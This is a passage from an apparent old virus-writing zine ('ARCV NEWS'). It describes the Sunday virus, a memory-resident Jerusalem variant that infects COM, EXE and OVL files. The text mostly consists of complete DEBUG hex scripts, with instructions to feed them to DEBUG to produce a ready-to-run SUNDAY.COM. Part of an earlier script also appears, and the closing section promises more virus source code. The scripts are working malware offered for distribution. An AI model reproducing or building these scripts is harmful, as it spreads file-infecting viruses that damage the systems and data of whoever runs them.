e 01F0  64 3C 7B D3 93 7B 7B 0D 75 80 79 0D 6D 82 79 3E 
e 0200  73 86 C2 9F 7B 30 44 6C 97 84 09 CC FA BA 73 86 
e 0210  36 DE 0F BD DB 8D 79 BE 7D 8F 79 F0 4C B7 A9 B7 
e 0220  B2 3C 79 C6 93 4B 7B F6 50 B9 7B 64 0C A2 2B 25 
e 0230  73 86 D8 FF 7B 25 71 86 D8 F9 7B DC 56 87 7B 42 
e 0240  7D 8C 79 6D D8 8D 79 26 70 86 90 CD EB 07 45 98 
e 0250  79 85 0E 87 92 01 7B 25 77 86 C2 84 79 73 9A D4 
e 0260  29 35 7F 57 B1 57 93 87 B9 AF 7D 94 79 D4 DA 98 
e 0270  79 27 00 84 DA 9A 79 81 6B 84 D8 F9 7B DC D8 9A 
e 0280  79 43 7D 98 79 85 7B 7B 7D 88 79 DD 21 3C 7B C6 
e 0290  93 E7 7B F6 3C 04 4D 7C 7A 8C 48 44 F5 5C DB E8 
e 02A0  7F 8A 64 8A 7C 26 97 85 48 72 C4 A0 79 D3 C2 84 
e 02B0  79 78 88 20 C5 AC 79 6C 21 84 21 3D 7B 86 CF C4 
e 02C0  93 B7 7B F6 6C B7 B2 B7 A9 3C 7B C6 93 A3 7B F6 
e 02D0  70 3E 73 86 C2 9F 7B 30 3B 6C 61 84 F0 92 7D 86 
e 02E0  F0 8A 7F 86 C3 85 2C 6C 77 84 CF BA 93 83 7B DC 
e 02F0  20 DD 21 9B 7C 47 E7 AA 84 9A 7B 86 B8 C7 41 D8 
e 0300  38 CB 36 C9 3A CA 3F AA 38 CB 36 84 84 5E 56 2E 
e 0310  8A 84 E8 01 B9 E8 01 F6 D0 2E 30 04 46 E2 F8 C3 
 
rcx 
220 
w 
q 
 
---------------------------------------------------------------------------
Apche..
ARCV NEWS                                                              005.
 
                             The Sunday Virus 
 
     According to Patty Hoffman, the Sunday virus is based on the Jerusalem
viruses, because the codes for both viruses are similar.  Sunday infects
COM, EXE, and OVL files, when they are executed, and it stays resident in
memory.  It was circulated around the Seattle, Washington area in 1989, and
is very common.

     How ever this version of Sunday doesn't seem to print any messages on
the screen, like some of the other versions do, every Sunday.  This virus
spreads rapidly, and is a great replicator.
 
     To create SUNDAY.COM, cut out the following code, and name the
resulting file sunday.scr.  Then, use this command:  DEBUG < SUNDAY.SCR
this will then produce the .COM all ready for use.
 
---------------------------------------------------------------------------
n sunday.com 
e 0100  E9 92 00 59 57 C8 F7 E1 EE E7 00 01 4C 1E 00 00   
e 0110  00 02 00 AB 00 0C 13 16 17 C7 02 BF 05 3A 1E 63   
e 0120  79 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06   
e 0130  5F BD 1D 80 00 00 00 80 00 BD 1D 5C 00 BD 1D 6C   
e 0140  00 BD 1D 00 0A 95 22 29 00 00 00 00 F0 02 00 4D   
e 0150  5A 87 01 14 01 ED 05 80 01 23 0B FF FF 8C 20 C0   
e 0160  06 89 19 C6 00 8C 20 1E 00 00 00 00 00 00 00 00   
e 0170  05 00 20 00 29 15 01 79 00 02 10 00 C0 20 02 00   
e 0180  54 61 28 99 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 01   
e 0190  00 00 00 00 00 FC 06 B8 00 00 8E C0 26 A1 84 00   
e 01A0  07 3D 4C 02 75 10 B4 DD BF 00 01 BE C2 06 03 F7   
e 01B0  2E 8B 4D 11 CD 21 8C C8 05 10 00 8E D0 BC C0 06   
e 01C0  50 B8 C6 00 50 CB FC 06 2E 8C 06 31 00 2E 8C 06   
e 01D0  39 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10   
e 01E0  00 2E 01 06 49 00 2E 01 06 45 00 B4 FF CD 21 80   
e 01F0  FC 04 75 10 07 2E 8E 16 45 00 2E 8B 26 43 00 2E   
e 0200  FF 2E 47 00 33 C0 8E C0 BB FC 03 26 8B 07 2E A3   
e 0210  4B 00 26 8A 47 02 2E A2 4D 00 26 C7 07 F3 A5 26   
e 0220  C6 47 02 CB 58 05 10 00 8E C0 0E 1F B9 C2 06 D1   
e 0230  E9 33 F6 8B FE 06 B8 3E 01 50 FF 2E 59 06 8C C8   
e 0240  8E D0 BC C0 06 33 C0 8E D8 2E A1 4B 00 89 07 2E   
e 0250  A0 4D 00 88 47 02 8B DC B1 04 D3 EB 83 C3 20 83   
e 0260  E3 F0 2E 89 1E 33 00 B4 4A 2E 8E 06 31 00 CD 21   
e 0270  B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06 19 00 0E   
e 0280  1F BA 4C 02 B8 21 25 CD 21 8E 06 31 00 26 8E 06   
e 0290  2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38 05 E0 F9   
e 02A0  8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 BB 35 00 1E   
e 02B0  06 50 53 51 52 B4 0F CD 10 3C 07 74 07 2E C7 06   
e 02C0  4A 02 00 B8 B8 08 35 CD 21 2E 89 1E 13 00 2E 8C   
e 02D0  06 15 00 0E 1F C7 06 1F 00 E0 79 B8 08 25 BA 0A   
e 02E0  02 CD 21 5A 59 5B 58 07 1F 9C 2E FF 1E 17 00 1E   
e 02F0  07 B4 49 CD 21 B4 4D CD 21 B4 31 BA C2 06 B1 04   
e 0300  D3 EA 83 C2 10 CD 21 32 C0 CF 2E 83 3E 1F 00 00   
e 0310  75 22 1E 06 56 57 50 8D 36 3E 02 0E 1F A1 4A 02   
e 0320  8E C0 BF 00 00 FC A5 A5 A5 A5 A5 A5 58 5F 5E 07   
e 0330  1F EB 06 90 2E FF 0E 1F 00 2E FF 2E 13 00 48 F0   
e 0340  61 F0 21 F0 48 F0 61 F0 21 F0 00 B8 9C 80 FC FF   
e 0350  75 05 B8 00 04 9D CF 80 FC DD 74 0E 3D 00 4B 75   
e 0360  03 EB 21 90 9D 2E FF 2E 17 00 58 58 B8 00 01 2E   
e 0370  A3 0A 00 58 2E A3 0C 00 F3 A4 9D 2E A1 0F 00 2E   
e 0380  FF 2E 0A 00 2E C7 06 70 00 FF FF 2E C7 06 8F 00   
e 0390  00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51 52   
e 03A0  56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05 8A   
e 03B0  15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 0F 03   
e 03C0  F7 E3 F7 E1 0B D2 75 05 3D C2 06 72 F0 2E 8B 16   
e 03D0  80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36 80 00   
e 03E0  8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80 2C   
e 03F0  20 46 EB EC 2E 89 36 57 06 B9 0B 00 2B F1 BF 84   
e 0400  00 0E 07 B9 0B 00 F3 A6 75 03 E9 C2 02 2E C6 06   
e 0410  56 06 00 90 2E 8B 36 57 06 8D 3E 55 06 4F 4E 26   
e 0420  8A 05 34 BB 3C 00 74 0D 3A 04 74 F1 2E C6 06 56   
e 0430  06 01 90 EB E8 2E 80 3E 56 06 00 74 16 4F 26 80   
e 0440  3D FF 74 2B 47 2E 8B 36 57 06 2E C6 06 56 06 00   
e 0450  90 EB CA 07 1F 5F 5E 5A 59 5B 58 33 C9 B8 01 43   
e 0460  CD 21 B4 41 CD 21 B8 00 4B 9D 2E FF 2E 17 00 B8   
e 0470  00 43 CD 21 72 05 2E 89 0E 72 00 72 25 32 C0 2E   
e 0480  A2 4E 00 1E 07 8B FA B9 41 00 F2 AE 80 7D FE 4D   
e 0490  74 0B 80 7D FE 6D 74 05 2E FE 06 4E 00 B8 00 3D   
e 04A0  CD 21 72 7C 2E A3 70 00 8B D8 B8 02 42 B9 FF FF   
e 04B0  BA FB FF CD 21 72 EB 05 05 00 2E A3 11 00 B9 05   
e 04C0  00 BA 6B 00 8C C8 8E D8 8E C0 B4 3F CD 21 8B FA   
e 04D0  BE 05 00 F3 A6 74 22 B0 00 B9 00 00 BA 00 00 B4   
e 04E0  42 CD 21 8D 16 DD 05 B9 14 00 B4 3F CD 21 81 3E   
e 04F0  EF 05 89 19 75 0A E9 91 01 B4 3E CD 21 E9 CF 01   
e 0500  B8 24 35 CD 21 89 1E 1B 00 8C 06 1D 00 BA 07 02   
e 0510  B8 24 25 CD 21 C5 16 80 00 33 C9 B8 01 43 CD 21   
e 0520  72 3B 2E 8B 1E 70 00 B4 3E CD 21 2E C7 06 70 00   
e 0530  FF FF B8 02 3D CD 21 72 24 2E A3 70 00 8C C8 8E   
e 0540  D8 8E C0 8B 1E 70 00 B8 00 57 CD 21 89 16 74 00   
e 0550  89 0E 76 00 B8 00 42 33 C9 8B D1 CD 21 72 3E 80   
e 0560  3E 4E 00 00 74 04 EB 5B 90 90 BB 00 10 B4 48 CD   
e 0570  21 73 0B B4 3E 8B 1E 70 00 CD 21 E9 51 01 FF 06   
e 0580  8F 00 8E C0 33 F6 8B FE B9 C2 06 F3 A4 8B D7 8B   
e 0590  0E 11 00 8B 1E 70 00 06 1F B4 3F CD 21 72 1F 03   
e 05A0  F9 33 C9 8B D1 B8 00 42 CD 21 BE 05 00 B9 05 00   
e 05B0  1E 0E 1F F3 A4 1F 8B CF 33 D2 B4 40 CD 21 72 0D   
e 05C0  E9 C7 00 B9 1C 00 BA 4F 00 B4 3F CD 21 72 4A C7   
e 05D0  06 61 00 89 19 A1 5D 00 A3 45 00 A1 5F 00 A3 43   
e 05E0  00 A1 63 00 A3 47 00 A1 65 00 A3 49 00 A1 53 00   
e 05F0  83 3E 51 00 00 74 01 48 F7 26 78 00 03 06 51 00   
e 0600  83 D2 00 05 0F 00 83 D2 00 25 F0 FF A3 7C 00 89   
e 0610  16 7E 00 05 C7 06 83 D2 00 72 3A F7 36 78 00 0B   
e 0620  D2 74 01 40 A3 53 00 89 16 51 00 A1 7C 00 8B 16   
e 0630  7E 00 F7 36 7A 00 2B 06 57 00 A3 65 00 C7 06 63   
e 0640  00 C6 00 A3 5D 00 C7 06 5F 00 C0 06 33 C9 8B D1   
e 0650  B8 00 42 CD 21 72 0A B9 1C 00 BA 4F 00 B4 40 CD   
e 0660  21 72 11 3B C1 75 23 8B 16 7C 00 8B 0E 7E 00 B8   
e 0670  00 42 CD 21 72 14 33 D2 B9 C2 06 B4 40 CD 21 B9   
e 0680  05 00 8D 16 05 00 B4 40 CD 21 2E 83 3E 8F 00 00   
e 0690  74 04 B4 49 CD 21 2E 83 3E 70 00 FF 74 31 2E 8B   
e 06A0  1E 70 00 2E 8B 16 74 00 2E 8B 0E 76 00 B8 01 57  
e 06B0  CD 21 B4 3E CD 21 0E 1F C5 16 80 00 2E 8B 0E 72   
e 06C0  00 B8 01 43 CD 21 8D 16 1B 00 B8 24 25 CD 21 07   
e 06D0  1F 5F 5E 5A 59 5B 58 9D 2E FF 2E 17 00 CD 20 BA   
e 06E0  00 11 01 ED 05 80 01 23 0B FF FF 95 22 00 0A D5   
e 06F0  44 00 00 00 00 00 00 00 00 00 00 FF BB F9 FA E8   
e 0700  F2 F8 FA 95 FE E3 FE BB F8 EE E9 FE 95 FE E3 FE   
e 0710  BB F7 F4 EF EE E8 95 F8 F4 F6 BB F8 EC F2 95 FE   
e 0720  E3 FE BB FE EF F9 FA E8 F2 F8 95 FE E3 FE BB F9   
e 0730  FA E8 F2 F8 FA 95 F8 F4 F6 BB 8A 89 88 95 FE E3  
e 0740  FE BB FF F9 FA E8 FE 95 FE E3 FE BB F9 FA E8 F2   
e 0750  F8 95 F8 F4 F6 BB 01 68 61 FC 03 00 00 00 00 00   
e 0760  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   
e 0770  00 00 00 00 00 00 00 00 8C 0D 01 00 20 1C C3 28   
e 0780  8C 0D 01 00 FE 26 2E 00 8C 0D 04 7F A7 20 6C 15   
e 0790  24 25 05 00 20 00 C6 08 60 C1 57 18 08 25 AB 00   
e 07A0  44 7F 0A 02 C2 06 57 18 BD 1D 47 01 04 7F 7C 00   
e 07B0  C2 06 B6 00 1C 09 AF 1D 3D 1C 07 02 BD 1D 02 02   
e 07C0  4D 3A CD 20 C8 F7 E1 EE E7 1A 1A 1A 1A 1A 1A 1A   
 
rcx 
7CF 
w 
q 
 
---------------------------------------------------------------------------

 
ARCV NEWS                                                              006.

                                 Closing.

     Well that it for this time the mag in future will be a Bi-Monthly
affair and I now offer out to you all to send in any articile for inclusion
in future issues.

     Well I'm not sure what will be in next month but we should have the
Asm source for Commander Bomber Virus and much more.